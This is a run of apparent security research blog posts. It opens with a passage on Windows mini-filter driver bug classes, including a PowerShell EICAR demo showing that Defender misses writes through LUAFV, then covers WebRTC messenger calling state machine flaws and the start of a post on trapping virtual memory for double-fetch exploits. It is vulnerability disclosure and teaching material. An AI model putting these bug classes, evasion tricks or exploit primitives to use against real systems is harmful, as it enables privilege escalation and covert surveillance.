The filter manager also exposes the FltAddOpenReparseEntry and FltRemoveOpenReparseEntry to simplify adding and removing these open reparse list entries. Searching for use of these APIs should give you an idea if the filter driver implements its own reparse point format.

The reason I mention this in the context of communication is that a filter driver will process these reparse buffers when accessing the file system. The NTFS driver only checks for the SeCreateSymbolicLinkPrivilege privilege if a user is writing the IO_REPARSE_TAG_SYMLINK tag. NTFS delegates the verification of the REPARSE_DATA_BUFFER structure which will be written to the file system by calling the kernel API FsRtlValidateReparsePointBuffer. The kernel API only does basic length checks for non-symlink tag types so the arbitrary bytes set in the DataBuffer field can be completely untrusted, which can allow for security issues during parsing.

Security Bug Classes

I’ve now provided examples of how a mini-filter operates and how you can communicate with it. Let’s finish up with an overview of potential bug classes to look for when doing a review. Some of these bug classes are common to any kernel driver, but others are very specifically due to the way mini-filters operate.

Where possible I’ll also provide an example of a vulnerability I’ve discovered to improve understanding. Note, this is not an exhaustive list, I’m sure there are some novel bug classes that I don’t know about which are missing from this list. Which is why it’s good to describe this process in more detail so others can take advantage of my knowledge and find new and interesting issues.

To aid in analysis I’ve uploaded my header file I use in IDA Pro to populate the filter manager types. You can get it from github. I’ve tried to ensure it’s correct and up to date, but there’s a chance that it is not. YMMV.

Common and garden variety memory safety hazards

Being native C code you can expect the same sorts of issues you’d find in any sizable code base including integer wrapping and incorrect reference counting leading to memory safety hazards. Any of the described communication methods could result in untrusted data being processed and mishandled. I don’t think I need to describe this in any detail.

Ignoring the RequestorMode Value

All filtered IO requests have an assigned RequestorMode parameter in the FLT_CALLBACK_DATA structure which indicates whether it originated from user or kernel mode code. If an IO request is dispatched from kernel mode code the IO manager and file system drivers typically disable security checks, such as file access checking.

There are a couple of related bug classes you’ll see with regards to RequestorMode. The first class is the filter driver ignoring its value. This can be a problem if the filter driver redirects the IO request to another file either directly or by using a reparse operation during file creation.

For example, CVE-2018-0877 was an issue I found in the WCIFS driver which provides file system virtualization for Desktop Bridge applications. The root cause was the driver would reparse to a user controllable location if the requested file didn’t exist in privileged Windows directories.

It’s common to find kernel code opening files inside privileged directories with RequestorMode set to the kernel. The kernel code can make the assumption this can’t be tampered with as only an administrator can normally modify those directories. The end result was a normal user application could get a file opened in the user controllable location but with access checking disabled. In the proof-of-concept in the issue tracker I exploit this to redirect a request for a National Language Support (NLS) file to ready arbitrary files on disk such as the SAM hive. The technique was described separately in this blog post.

Incorrect RequestorMode Check.

The second bug class in checking the RequestorMode can occur during a file create operation. Specifically the RequestorMode field is checked but the driver does not verify if access checking has been re-enabled through the IO_FORCE_ACCESS_CHECK flag passed to IoCreateFile and variants. For a bit more context on this bug class refer to my blog post from last year where I collaborated with Microsoft on related issues.





    PVOID* CompletionContext

) {

    if (!SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege, 

                                Data->RequestorMode)) {

        Data->IoStatus.Status = STATUS_ACCESS_DENIED;

        return FLT_PREOP_COMPLETE;


    // Perform some privileged action.



The example above shows misuse of the RequestorMode field. It passes it directly to SeSinglePrivilegeCheck, if it indicates the call came from the kernel then the privilege check will always return TRUE meaning the privileged action will be taken. If you read the linked blog post, this can happen if the file is opened through calling IoCreateFileEx or similar APIs with incorrect flags.

To guard against this issue the driver needs to check if the SL_FORCE_ACCESS_CHECK flag has been set in the OperationFlags field of the FLT_IO_PARAMETER_BLOCK structure. If that flag is set the value of RequestorMode should always be assumed to be from user mode.

Driver and Kernel IO Operation Mismatch

The Windows platform is constantly iterating new features, this is even more true since the release of Windows 10 and its six month release cycles. This can introduce new features to the IO stack such as new information classes or IO control codes or additional functionality to existing features.

For the most part the mini-filter driver can just ignore operations it doesn’t care about. However, if it does process an IO operation it needs to match with what’s implemented in the rest of the OS, which can be difficult if the OS changes around the driver.

An example of this issue is the WOF driver’s handling of reparse points. To prevent applications from setting arbitrary reparse points with the IO_REPARSE_TAG_WOF tag it handles the FSCTL_SET_REPARSE_POINT IO control code and rejects any attempt to set a reparse point buffer with that tag. To complete the trick the driver also hides a file’s reparse point from being queried or removed if it’s set to IO_REPARSE_TAG_WOF.

The issue CVE-2020-17139 resulted from the OS adding a new FSCTL_SET_REPARSE_POINT_EX IO control code which the WOF driver didn’t handle. This allowed an application to add or remove the WOF IO tag which resulted in a way of getting an arbitrary file to have a cached code signature to bypass mechanisms such as Windows Defender Application Control.

Altitude sickness.

Sorry, I couldn’t resist the pun. This is a bug class which is caused by the ordering of filter operations based on the assigned altitudes of the driver. For example, if you look at the list of filters from the fltmc command shown earlier in this blog post you’ll notice that WdFilter which is the real-time scanner for Windows Defender is at a much higher altitude than LUAFV which is the UAC file virtualization driver.

What this means is if LUAFV performs some operations, such as calling FltCreateFileEx which only dispatches the IO request to filters below LUAFV then Windows Defender will miss the file operations and not be able to act on them. Let’s show this in action with a simple PowerShell script.

function Write-EICAR {


    # Replace with a real EICAR string.

    $eicar = [System.Text.Encoding]::ASCII.GetBytes("<EICAR>")

    Use-NtObject($f = New-NtFile -Win32Path $Path -Disposition OpenIf -Access ReadData, WriteData) {

        $f.Length = 0

        Write-NtFile $f $eicar -Offset 0



PS> Write-EICAR -Path "$env:TEMP\eicar.txt"

PS> Enable-NtTokenVirtualization

PS> Write-EICAR -Path "$env:windir\system32\license.rtf"

The Write-EICAR function opens or creates a new file at a specified path, truncates the file to a zero length, writes the EICAR string then closes the file. Note I’ve replaced the EICAR string with the dummy <EICAR>. You’ll need to look up the real string online and replace it before running the test. I did this to prevent some overzealous AV detecting the EICAR string and quarantining this web page.

We create an EICAR file in the temporary folder. Once the file has been closed Windows Defender’s real-time scanner should scan it and warn the user that it has quarantined the file.

However, once we enable virtualization using Enable-NtTokenVirtualization and write to an existing system file the file processing is handled inside the LUAFV driver after WdFilter has done its checking. Therefore the second command will succeed, although the file which is actually created is in the user’s virtual store, we’ve not overwritten license.rtf.

Worth pointing out that this only allows you to create the file on disk. The instant that virtualized file is used by any application Windows Defender will see it and quarantine it. Therefore it provides no real value to bypass Windows Defender’s signature checks. However, I think this is an interesting demonstration of the types of issues you could find due to the differing altitudes.

The mismatch with the filter altitude is also a potential reason you’ll miss file events in Process Monitor. Process Monitor runs its mini-filter to capture file events at altitude 385200 which is above LUAFV. You will not see most direct virtualization events. However we can do something about this, we can use fltmc to detach the Process Monitor filter from a volume and reattach at a much lower altitude. Start Process Monitor then run the following commands to reattach to the C: drive.

C:\> fltmc detach PROCMON24 C:

C:\> fltmc attach PROCMON24 C: -i "Process Monitor 24 Instance" -a 100

You might need to replace 24 with an appropriate version number for your version of Process Monitor. You should start seeing more events which were previously hidden by LUAFV and other filter drivers at lower altitudes. This should help you monitor file access for any interesting behavior. Sadly even though you can try and attach the Process Monitor filter to the named pipe device it won’t work as the driver doesn’t indicate support for that device.

Note, that stopping and starting the Process Monitor capture will reset the volume instances for the filter driver and remove the low altitude instance. If you create the new instance without the instance name (the string after -i) then it won’t get deleted, however Process Monitor will show duplicate entries for any IO request which is the same at both altitudes. The Process Monitor driver does not support attaching at a different altitude through any command line options, this would be one of those cases where it’d be useful for this tooling to be open source so that this feature could be added.

As an example before adding the low altitude instance if you create the EICAR test file you’ll see the following events:










Desired Access: Read Data, Write Data





EndOfFile: 0





Offset: 0, Length: 68





I’ve added an ID column which indicates the event taking place. The events match the code for creating the EICAR file, we open the file for read and write access, set the length to 0, write the EICAR string and then close the file. Note that in event ID 2 the path to the file has changed from the original one in system32 to the virtual store. This is because the file is “delay virtualized” so it’ll only be created if a write IO request, such as changing the file length, is dispatched to the file.

Now let’s compare the events when the altitude is set to 100:










Desired Access: Read Data, Write Data




Desired Access: Read Data





Desired Access: Read Data, Read Attributes




Desired Access: Write Data, Write Attributes




EndOfFile: 538




Offset: 0, Length: 538




Offset: 0, Length: 538




Offset: 538, Length: 16,384










Desired Access: Read Data, Write Data




EndOfFile: 0





Offset: 0, Length: 68, Priority: Normal








You can see that the list of events is much longer in the second case (I’ve even removed some for brevity). For event 0 it’s no longer a single create IO request for the license.rtf file. As the user doesn’t have write access when the create call is made to the file system it results in an ACCESS DENIED error. The LUAFV driver sees the error in its post-create callback and as virtualization is enabled it makes a second create for only read access. This second create succeeds. Due to the altitude of LUAFV this process is normally hidden from the Process Monitor.

In the first table event ID 2 we saw the caller setting the file length to 0. However in the second table we now see that the virtual file needs to be created and the contents of the original file are copied into the new virtual file. Only after that operation has been completed will the length of the file be set to 0. The last 2 events are more or less the same.

I hope this is a clear demonstration both of how the altitude directly affects the operation of mini-filter drivers as well as how much file information you might be missing in Process Monitor without realizing it.

Concurrency and Reentrancy

The IO manager is designed to operate asynchronously. It’s possible that multiple threads could be calling into the same IO driver at the same time and the filter manager is no different. There’s no explicit locking in the filter manager which would prevent multiple IO requests being dispatched at the same time to the same file object. This can lead to concurrency and reentrancy issues.

The filter driver can assign shared state based on the file stream or file object. This can be extracted in the filter when operating on the file and used to store and retrieve the current state information. If you dispatch multiple IO requests to the same file it can result in an invalid state or memory corruption issues.

An example of this kind of issue is CVE-2019-0836 which was a race condition in the LUAFV driver related to handling of the SECTION_OBJECT_POINTERS structure in the file object. Basically by racing a read against a write IO request on the same file it was possible to get the wrong SECTION_OBJECT_POINTERS structure assigned to the virtual file allowing a normal user to bypass access checks and map a read-only file as writable.

To solve this problem the driver needs to not maintain complex state between pre and post operation callbacks or over any calls out to any API which could be trapped by a user-mode application.

Incorrect Forwarding of IO Operations

We showed earlier how to retarget an IO operation to another file object by switching the TargetFileObject pointer. This needs to be done very carefully as when working with file object pointers directly almost any operation can be performed on them. For example, if a file is opened read-only a write operation can still be dispatched to the file object itself and it’ll succeed.

The only thing which prevents a user-mode application from doing this is the kernel checks that the handle passed by the application to the NtWriteFile system call has the FILE_WRITE_DATA access right set. If not the system call can return STATUS_ACCESS_DENIED. However, if the handle has write access to a file object, but the filter driver redirects that operation to a read-only file then the check is bypassed and the user can write to a file they don’t necessarily control.

Another place this can happen is the dispatch of IO control codes. Each control code has a flag which indicates if the file handle requires read and/or write access to be dispatched. This check is performed in the IO manager before the request ever makes it to the file system. If the filter drivers blindly forward IO control codes to a separate file it could send a code which normally requires write access on the handle bypassing security checks.

The LUAFV driver is a good example of a mini-filter driver where this forwarding takes place. The previously mentioned issue, CVE-2019-0836 while it’s a concurrency issue also relies on the fact that the file object can be written to even though it was opened read-only.


In summary I think that mini-filter drivers are an under-appreciated source of privilege escalation bugs on Windows. In part that’s because they’re not easy to understand. They have complex interactions with the rest of the IO system which makes understanding difficult but can introduce really subtle and interesting issues. I hope I’ve given you enough information to better understand how mini-filter drivers function, how you communicate with them and what sorts of unique bug classes you might discover.

If you want some more information a good blog on the inner workings of filters drivers is Of Filesystems and Other Demons. It’s not been updated in a long while but it still contains some valuable information. You can also refer to MSDN which has a fairly comprehensive section on mini-filters as well as the Windows Driver Kit sample code. Finally as a reminder I’ve uploaded a filter manager header file for use in reverse engineering tools such as IDA Pro.

The State of State Machines

Posted by Natalie Silvanovich, Project Zero

On January 29, 2019, a serious vulnerability was discovered in Group FaceTime which allowed an attacker to call a target and force the call to connect without user interaction from the target, allowing the attacker to listen to the target’s surroundings without their knowledge or consent. The bug was remarkable in both its impact and mechanism. The ability to force a target device to transmit audio to an attacker device without gaining code execution was an unusual and possibly unprecedented impact of a vulnerability. Moreover, the vulnerability was a logic bug in the FaceTime calling state machine that could be exercised using only the user interface of the device. While this bug was soon fixed, the fact that such a serious and easy to reach vulnerability had occurred due to a logic bug in a calling state machine -- an attack scenario I had never seen considered on any platform -- made me wonder whether other state machines had similar vulnerabilities as well. This post describes my investigation into calling state machines of a number of messaging platforms, including Signal, JioChat, Mocha, Google Duo, and Facebook Messenger.

WebRTC and State Machines

The majority of video conferencing applications are implemented using WebRTC, which I’ve discussed in several past blog posts.  WebRTC connections are created by exchanging call set-up information in Session Description Protocol (SDP) between peers, a process which is called signalling. Signalling is not implemented by WebRTC, which allows peers to exchange SDP in whatever secure communication message is available to them, usually WebSockets for web applications, and secure messaging for messaging applications.

There are a few types of SDP that can be exchanged by WebRTC peers. In a typical connection, the caller starts off by sending an SDP offer, and then the callee responds with an SDP answer. These messages contain most information that is needed to transmit and receive media, including codec support, encryption keys and much more. After the offer/answer exchange, peers can send SDP candidates to other peers. Candidates are potential network paths that the two peers can use to connect to each other, and SDP candidates contain information such as IP addresses and TURN servers. Peers usually send more than one candidate to a peer, and candidates can be sent at any time during a connection.

WebRTC connections maintain an internal state related to whether an offer or answer has been received and processed, however, applications that use WebRTC usually have to maintain their own state machine to manage the user state of the application. How the user state maps to the WebRTC state is a design choice made by the WebRTC integrator, which has both security and performance consequences. For example, some applications do not exchange any SDP until the callee user has interacted with the application to answer the call, meanwhile others set up the peer-to-peer connection, and start sending audio and video from caller to callee before the callee is even notified of the call.

Regardless of design, transmitting audio or video from an input device must be directly enabled by application code using WebRTC. This is usually done using a feature called tracks. Every input device is considered a ‘track’, and each specific track must be added to a specific peer connection by calling addTrack (or language equivalent) before audio or video is transmitted. Tracks can also be disabled, which is useful for implementing mute and camera-off features. Each track also has an RTPSender property that can be used to fine-tune the properties of transmission, which can also be used to disable audio or video transmission.

Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the peer connection. However, when I looked at real applications they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee.

Signal Messenger

I looked at Signal in September 2019, and at that time, the application had a calling setup that is very similar to what is recommended in WebRTC documentation.

A peer-to-peer connection is established, and then the callee's audio track is added to the connection when the callee accepts the call by interacting with the user interface. Then a message is sent to the caller via the peer-to-peer connection, telling it to also move to the connected state and add the track.

Unfortunately, the application didn’t check that the device receiving the connect message was the caller device, so it was possible to send a connect message from the caller device to the callee. This caused the audio call to connect, allowing the caller to hear the callee’s surroundings. I tested this bug by changing Signal’s open-source code to send the message and recompiling the attacking client.

This vulnerability was fixed in the client in September 2019, and since then, Signal’s signalling code has been replaced by the ringrtc project, which uses a more conservative state machine.

This bug was purely in Signal’s code, and was not due to a misunderstanding of WebRTC functionality. The state machine design was largely effective requiring user consent to transmit audio, but a specific check was not implemented.

JioChat and Mocha

I accidentally found two very similar vulnerabilities in JioChat and Mocha messengers in July 2020 while testing whether a WebRTC exploit would work on them. They both had a similar signalling design, which was server-mediated.

The offer and answer are exchanged via the server, and then both the caller and the callee send their candidates to the server. The server then stores them until the callee interacts with their device and accepts the call. Then the peer-to-peer connection is created, and when WebRTC enters into its internal connected state, the track is added, causing audio and video to be transmitted.

This design has a fundamental problem, as candidates can be optionally included in an SDP offer or answer. In that case, the peer-to-peer connection will start immediately, as the only thing preventing the connection in this design is the lack of candidates, which will in turn lead to transmission from input devices. I tested this by using Frida to add candidates to the offers created by each of these applications. I was able to cause JioChat to send audio without user consent, and Mocha to send audio and video. Both of these vulnerabilities were fixed soon after they were filed by filtering SDP on the server.

These issues were caused by a misunderstanding of how WebRTC works coupled with an attempt to improve WebRTC performance with an unusual signalling design. Normally, WebRTC integrators have to decide whether to wait until the callee has answered the call to set up the peer-to-peer connection. Setting the connection up early improves performance and prevents the user from having to wait when they answer a call, but also greatly increases the remote attack surface of WebRTC. These applications tried to improve performance without the security cost with this design, but didn’t consider all the ways that WebRTC can start a peer-to-peer connection.

It is generally not a good idea for integrators to gate audio or video transmission on any WebRTC feature that is not adding or enabling tracks. To start, many WebRTC features are complex, so it is easy to make a mistake that allows audio or video to be transmitted. Also, if the feature that is gated on is not commonly-used or not a security feature, it could be poorly tested or changed in the future.


I looked at Google Duo in September 2020. Duo’s signalling methodology is somewhat different from a lot of messengers because it supports a feature that allows the callee to preview the caller’s video before answering. So a one-way video stream needs to be set up before the call is answered.

The image above shows the setup of the one-way video stream. Dotted lines represent asynchronous calls made using Java executors. The lack of transmission from callee to caller is enforced by two methods. First, the SDP offer contains the property a=sendonly for video, which causes video to only be transmitted in one direction. Also, when the callee receives the offer from the caller, it adds the video track to the peer connection, but then disables it using the RTPSender property of the track (the audio track is not added or enabled until the user accepts the call).

Neither of these methods effectively prevents video from being transmitted from callee to caller. The SDP property is easy to get around because the caller provides the SDP to the callee, so it can be easily altered. Disabling the video track as soon as the offer is processed should work, except for the asynchronous design. Normally, the setLocalDescription method (which processes the SDP offer) calls the callback onSetSuccess, and then sets up the peer-to-peer connection after the callback has finished. However, if the callback makes another asynchronous call, the guarantee that onSetSuccess finishes before the connection is set up no longer holds, because the setLocalDescription method only waits for the onSetSuccess thread to finish. This creates a race between disabling the video and setting up the connection, so in some situations, the callee could transmit a few video frames to the caller before transmission is disabled.

I tested this by using Frida to alter the SDP sent by the callee, and then I tried many methods to win the race. It turned out to be fairly hard to win, and I spent roughly two weeks trying to figure out how to slow down the video disable call enough to give the connection time to set up. I ended up sending multiple offers and adding candidates to the offers, which decreased the connection time, as the network connection was already established. Then I sent many messages that take a long time to process through the data channel of the peer-to-peer connection to slow down the disabling of the video track. Data messages are processed on the same thread queue as disabling the video track in Duo, so sending data messages filled up the queue that was needed to disable video with many other entries, delaying the track being disabled.

This bug was fixed in December 2020 by removing the asynchronous call from onSetSuccess. While Duo generally designed signalling in a way that is effective in preventing video transmission from callee to caller, implementing the design asynchronously introduced problems. Asynchronous signalling implementations are becoming more common on mobile applications, as there are many unpredictable situations in which WebRTC needs to wait on the network or a peer, and separating function calls into different threads means a delay in one call won’t affect unrelated functionality. However, asynchronous calls make it more difficult to model how a state machine will behave in all situations, so it is important to be cautious about adding asynchronous calls to WebRTC signalling. In this case, the asynchronous call to disable the video track added nothing in terms of performance, as there is no reason any of the calls made to disable the track could block, and onSetSuccess already runs in its own thread and can yield to higher priority threads. It’s important to balance the risk and benefit of asynchronous calls and not indiscriminately include them in an application.

Facebook Messenger

I looked at Facebook Messenger in October 2020. It was a fairly challenging target because of the amount of reverse engineering required. Stepping back a bit, WebRTC has bindings in several programming languages which allow it to be integrated into applications using that language. Most Android applications that integrate WebRTC use the Java bindings. This makes investigating signalling state machines fairly straightforward, as important Java functions, such as setLocalDescription (which processes offers and answers), addRemoteIceCandidate (which processes candidates) and addTrack (which adds tracks to connections) can be hooked in Frida and logged for analysis. It is also reasonably straightforward to change the behavior of the attacker device using these calls.

Facebook Messenger does not use Java bindings to integrate WebRTC, instead it uses C++ bindings. Moreover, it statically links WebRTC to a larger library (, which is likely the rsys library mentioned in this article), so the symbols for calls to bindings get stripped, making them difficult to hook. In addition, Facebook Messenger serializes SDP into another format before it is transmitted, so it is difficult to determine how signalling works by monitoring traffic.

I eventually realized that the only reasonable way to figure out how Facebook Messenger signalling works was to figure out its network protocol. Thankfully, Facebook has publicly stated that they use fbthrift, a branch of thrift. I loaded the library into IDA to see if I could find where it called into the thrift library, but while there were a few calls, it looked like the code was mostly statically linked. I eventually figured out that this is because thrift generates serialization code for every protocol implemented, so most of the serialization and deserialization code ends up compiled with the protocol processing code. So I decided to compile fbthrift, make a sample serializer and look at it in IDA, so I could get an impression of what compiled fbthrift serializers look like. I noticed that during serialization, members of an object are serialized by calling a method called writeFieldBegin. I also noticed that when this method is called, the field name is required, even though it is usually not included in the serialized output. So I looked for a function in librtcR20 that was very frequently called with different string parameters that seemed reasonable for field names. Not very many functions fulfilled that criteria, so I was able to identify writeFieldBegin.

At this point, I could find many places where objects are serialized, and needed to identify which one was the message used to set up WebRTC calls.

Earlier, I’d noticed a method in the library called P2PCall::OnP2PMessageFromPeer (note that the symbol for this method is stripped, but the method name is logged when it is called). This seemed a likely place that a deserialized message would be processed. Searching for the string “P2PMessage”, I found the serialization code for a type called P2PMessageRequest. I assumed that this was where call setup messages were created.

Thrift serialization code is generated based on class definitions in a thrift definition file. Based on the field names and types passed to writeFieldBegin, I was able to slowly reverse engineer the complete thrift definition for this type. It was tedious work, because the definition was fairly long, and the code is obfuscated in a way that makes register use inconsistent, so I wasn’t confident that any automated approach would be accurate.

Below is a sample of the serialization code.

Notice that it writes two fields from an object of type Extmap. The first, named id, is a mandatory field. The function that writes the code is as follows.

The field identifier written is 1, and the field type is 8, which translates to i32 (32-bit integer). The second field is an optional field, and the registers to write it are set in the following code.

This sets the field name to uri, the field identifier to 2, and the field type to 8 (also i32). All together, this code can be represented by the following thrift definition.


struct Extmap{

        1: i32 id

        2: optional i32 uri



After similarly reverse engineering every field of the P2PMessageRequest type, I had a complete thrift definition, available here.

I did two things with this thrift definition.  First, I used it to determine the layout of the P2PMessageRequest type in C++. This was extremely valuable, as it allowed me to load the struct definition into IDA with every single field named correctly. This made it much easier to understand how incoming messages are handled in P2PCall::OnP2PMessageFromPeer. This ended up being a bit of a process. fbthrift can generate C++ header files directly from a thrift definition, but these are very long and contain a lot of unnecessary definitions, and can not be processed by IDA. So I ended up compiling the generated source and loading it into IDA, and then exporting the structure definitions and importing them into another IDA instance where was already loaded. A few fields had different sizes in my compilation versus Facebook’s, but it was close enough that I could get it to work with a few modifications.

Below is an example of code decompiled in IDA with the thrift definition imported, to give an idea of how much easier it makes it to understand the processing of the message object.

I was also able to decode and generate messages sent over the network. To do this, I generated the serialization code from the thrift definition in Python, as thrift supports code generation in many languages. Then, I was able to import this code when using Frida Python to hook functions in Facebook Messenger.

Then I needed to find the code that handled incoming P2PMessageRequest messages. Since these messages are handled by native code, meanwhile most Facebook messages are handled by Java code, I looked for a native call with an appropriate name. I found com.facebook.webrtc.WebrtcEngine.onThriftMessageFromPeer. I hooked this method with Frida, and fed its byte array parameter in the generated deserializer, and it decoded incoming messages.

I found a similar method used to send thrift messages, sendThriftToPeer (this method’s class name is obfuscated and changes in every version of Facebook Messenger, but it can be found by grepping the application’s smali). I was also able to hook this method, and alter its byte array parameter, to change a P2PMessageRequest message sent by Facebook Messenger.

Now, I was able to understand Facebook Messenger’s signalling state machine. There are two different ways that signalling can occur, depending on where the user is signed into Facebook Messenger. If the user is signed in on multiple devices or browsers, very little happens before the callee interacts with their device. The offer, answer and candidates are exchanged, but they are stored by the callee device and not processed until the callee user answers the call. This makes sense, because Facebook Messenger doesn’t know what device to connect to otherwise.

If the callee is only signed in on a single device, the state machine is more interesting.

In this case, Facebook Messenger enables the track as soon as an offer is received, but alters the offer so that all outgoing streams are inactive. It then replaces the offer with one where they are active when the user interacts with the device.

I was concerned that there might be a way to bypass the alteration of the offer, but I looked at how this was done, and while I generally don’t recommend using anything other than adding or disabling tracks to disable input device transmission, it was fairly robust. The offer is altered after the SDP is decoded into an internal WebRTC object, and the changes are made directly to this object, which eliminates the possibility of parsing errors.

However, looking at how incoming messages are handled, I noticed that many message types other than offers, answers and candidates are processed before the call is answered. One type that stood out was called SdpUpdate. When an SdpUpdate message is received, the local offer or answer is updated by calling setLocalDescription.

This message type didn’t do anything when sent to the state machine above, as it is already storing SDP and waiting to call setLocalDescription. But in the situation where the user is logged into two devices, it caused setLocalDescription to be called and started the audio connection.

It is not clear what the SdpUpdate message type is used for in Facebook Messenger. I tried many scenarios on my test devices, including network switchover, and was not able to generate one in normal use. Regardless, it is clear that it was not intended for this message type to be received before the call is answered. It is similar to the Signal bug described above, in that it is not related to the application’s use of WebRTC, but due to a missing check when handling input that can cause state transitions.

This vulnerability was fixed in November 2020 with server changes that prevent this message type from being sent before a call is connected.

Other Applications

There were a few other applications I looked at and did not find problems with their state machines. I looked at Telegram in August 2020, right after video conferencing was added to the application. I did not find any problems, largely because the application does not exchange the offer, answer or candidates until the callee has answered the call. I looked at Viber in November 2020, and did not find any problems with their state machine, though challenges reverse engineering the application made this analysis less rigorous than the other applications I looked at.


The majority of calling state machines I investigated had logic vulnerabilities that allowed audio or video content to be transmitted from the callee to the caller without the callee’s consent. This is clearly an area that is often overlooked when securing WebRTC applications.

The majority of the bugs did not appear to be due to developer misunderstanding of WebRTC features. Instead, they were due to errors in how the state machines are implemented. That said, a lack of awareness of these types of issues was likely a factor. It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.

Many of these state machines had needless complexity in how they handled call set-up, which was also a factor. Unnecessary threading, reliance on obscure features and large numbers of states and input types increase the likelihood of this type of vulnerability occurring in a signalling state machine.

It is also concerning to note that I did not look at any group calling features of these applications, and all the vulnerabilities reported were found in peer-to-peer calls. This is an area for future work that could reveal additional problems.


I investigated the signalling state machines of seven video conferencing applications and found five vulnerabilities that could allow a caller device to force a callee device to transmit audio or video data. All these vulnerabilities have since been fixed. It is not clear why this is such a common problem, but a lack of awareness of these types of bugs as well as unnecessary complexity in signalling state machines is likely a factor. Signalling state machines are a concerning and under-investigated attack surface of video conferencing applications, and it is likely that more problems will be found with further research.

Windows Exploitation Tricks: Trapping Virtual Memory Access

Posted by James Forshaw, Project Zero

This blog is a continuation of my series of Windows exploitation tricks. This one describes an exploitation trick I’ve been trying to develop for years, succeeding (mostly, more on that later) on the latest versions of Windows 10. It’s a trick to trap access to virtual memory, get feedback when it occurs and delay access indefinitely. The blog will go into some of the background for why this technique is useful, an overview of the research I did to find the trick as well as an overview of the types of vulnerabilities it can be used with.


When would you need such an exploitation trick? A good example of the types of security vulnerabilities which can benefit can be found in the seminal Bochspwn research by Mateusz Jurczyk and Gynvael Coldwind. The research showed a way of automating the discovery of memory double-fetches in the Windows kernel.

If you’ve not read the paper, a double-fetch is a type of Time-of-Check Time-of-Use (TOCTOU) vulnerability where code reads a value from memory, such as a buffer length, verifies that value is within bounds and then rereads the value from memory before use. By swapping the value in memory between the first and second fetches the verification is bypassed which can lead to security issues such as privilege escalation or information disclosure. The following is a simple example of a double fetch taken from the original paper.

DWORD* lpInputPtr = // controlled user-mode address

UCHAR  LocalBuffer[256];


if (*lpInputPtr > sizeof(LocalBuffer)) { ①



RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);②

This code copies a buffer from a controlled user mode address into a fixed sized stack buffer. The buffer starts with a DWORD size value which indicates the total size of the buffer. Memory corruption can occur if the size value pointed to by lpInputBuffer changes between the first read of the size value to compare against the buffer size ① and the second read of the size when copying into the buffer ②. For example, if the first time the value is read it’s 100 and the second it’s 400 then the code will pass the size check as 100 is less than 256 but will then copy 400 bytes into that buffer corrupting the stack.

Once a vulnerability such as this example was discovered Mateusz and Gynvael needed to exploit it. How they achieved exploitation is detailed in section 4 of the paper. The exploit techniques that were identified were all probabilistic. Exploitation typically required two threads racing each other, with one reading and one writing. The probabilistic nature of success is due to the probability that in between the first read from a memory location and the second read the writing thread sets a new value which exploits the vulnerability.

To widen the TOCTOU window many of the techniques described abuse the behavior of virtual memory on Windows. A process on Windows can typically access a large virtual memory region up to 8TiB size. This size is likely to be significantly larger than the physical memory in the system, especially considering the limit is per-process, not per-system. Therefore to maintain the illusion of such a large memory address space the kernel uses on-demand memory paging.

When memory is allocated in the process the CPU’s page tables are set up to indicate the presence of the memory region but are marked as invalid. At this point the virtual memory region has been allocated but there is no physical memory backing it. When the process tries to access that memory region the CPU will generate an exception, generally referred to as a page-fault, which is handled by the kernel.

The kernel can look up the memory address which was accessed to cause the page-fault and try and fix the address. How the page-fault is fixed depends on the type of memory access. A simple example is if the memory was allocated but not yet used the kernel will get a physical memory page, initialize it to zeros then adjust the page tables to map that new physical memory page at the faulting address. Once the page-fault has been fixed the faulting thread can be restarted at the instruction which accessed the memory and the memory access should now succeed as if it was always present.

A more complex scenario is if the page is part of a memory mapped file. In this case the kernel will need to request that the page’s data is read back from disk before it can satisfy the page-fault. This can take quite a long time, at least for spinning rust disks, so it might require the faulting thread to be suspended while it waits for the page to be read. Once the page has been read the memory can be fixed up, the original thread can be resumed and the thread restarted at the faulting instruction.

Overview diagram of page fault causing access to the file system. A user application is shown reading memory from a file mapped into memory. When the memory read occurs a page fault is generated in the kernel. As the memory is part of a file mapping this calls into the IO Manager which then requests the file data from the file system. The read data is then returned back through the kernel to satisfy the page fault and the user application can complete the memory read.

The end result is it can take a significant amount of time, relative to a CPU’s native speed that is, to handle a page-fault. However, abusing these virtual memory behaviors only widens the TOCTOU window, it didn’t allow for precise timing to swap values in memory. The result is the exploitation techniques still came with limitations. For example, it was very slow if not impossible in some cases to exploit on a machine with a single CPU core as it relies on having concurrent threads reading and writing.

An ideal exploit primitive would be one where the exploitation window can be made arbitrarily large so that it becomes trivial to win the race. Taking previous experience and knowledge of existing bug classes my ideal primitive would be one which meets a set of criteria:

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

While meeting all these criteria would be ideal, there’s no guarantee we’ll meet all or any of them. If we only meet some then the range of exploitation vulnerabilities might be limited. Let’s start with a quick overview of the existing work which might give us an idea of how to proceed to find a primitive.

Existing Work

Having spoken to Mateusz and made an effort to look for any subsequent work there seems to be little novel work over and above the original Bochspwn paper on the exploitation of these types of TOCTOU issues. At least this is true for exploitation on Windows, however, novel techniques have been developed on other platforms, specifically Linux. Both of these techniques rely on the behavior of virtual memory I previously described.

The first technique in Linux makes use of Userfault File Descriptor (userfaultfd) to get notifications when page-faults occur in a process. With userfaultfd enabled a secondary thread in the process can read a notification and handle the page-fault in user mode. Handling the fault could be mapping memory at the appropriate location or changing page protection. The key is the faulting thread is suspended until the page-fault is handled by another thread. Therefore if a kernel function accessed the memory the request will be trapped until it's completed. This allows for a primitive where the memory access can be delayed indefinitely as well as having a timing signal for the access. Using userfaultfd also allows the fault to be distinguished between read and write faults as the memory page can be write-protected

